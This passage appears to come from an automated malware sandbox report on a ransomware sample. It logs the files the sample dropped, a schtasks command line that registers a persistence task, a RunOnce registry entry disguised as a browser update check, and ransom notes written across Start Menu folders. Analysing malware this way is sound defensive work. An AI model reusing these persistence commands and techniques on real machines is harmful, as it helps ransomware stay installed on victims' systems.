                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmpB7BE.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\AppData\Roaming\jVYbanglCI.exeJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3BD7.tmpJump to behavior
                      Source: classification engineClassification label: mal100.rans.evad.winEXE@28/534@0/1
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                      Source: Mm7Yq5V7Lu.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile written: C:\Users\desktop.iniJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                      Source: Mm7Yq5V7Lu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Mm7Yq5V7Lu.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_00962ABC push ds; ret 1_2_00962ACC
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_00962AAA push ds; ret 1_2_00962AAE
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_00962ACE push ds; ret 1_2_00962AD2
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_00962432 push es; ret 1_2_0096259E
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_0096262A push es; ret 1_2_00962640
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_0092666F push es; retf 1_2_009267AB
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_00962582 push es; ret 1_2_0096259E
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 1_2_009625F4 push es; ret 1_2_00962628
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004021A3 push ecx; ret 7_2_004021B3
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F12ACE push ds; ret 7_2_00F12AD2
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F12ABC push ds; ret 7_2_00F12ACC
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F12AAA push ds; ret 7_2_00F12AAE
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00ED666F push es; retf 7_2_00ED67AB
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F12432 push es; ret 7_2_00F1259E
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F1262A push es; ret 7_2_00F12640
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F125F4 push es; ret 7_2_00F12628
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00F12582 push es; ret 7_2_00F1259E
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_0054666F push es; retf 10_2_005467AB
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00582432 push es; ret 10_2_0058259E
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_0058262A push es; ret 10_2_00582640
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00582ACE push ds; ret 10_2_00582AD2
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00582ABC push ds; ret 10_2_00582ACC
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00582AAA push ds; ret 10_2_00582AAE
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_005825F4 push es; ret 10_2_00582628
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_00582582 push es; ret 10_2_0058259E
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_06EB32E4 push esp; ret 10_2_06EB32EE
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_06EB43CB push ecx; retf 10_2_06EB43CC
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 10_2_06EB1FC9 push 00000024h; ret 10_2_06EB1FCB
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_00A22AAA push ds; ret 12_2_00A22AAE
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_00A22ABC push ds; ret 12_2_00A22ACC
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeCode function: 12_2_00A22ACE push ds; ret 12_2_00A22AD2
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.44976169273
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.44976169273
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\Windows PowerShell\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\Startup\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\Maintenance\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\Administrative Tools\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\Accessories\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile created: C:\Users\user\Start Menu\Programs\Accessibility\read-me.txtJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrowserUpdateCheckJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrowserUpdateCheckJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrowserUpdateCheckJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrowserUpdateCheckJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
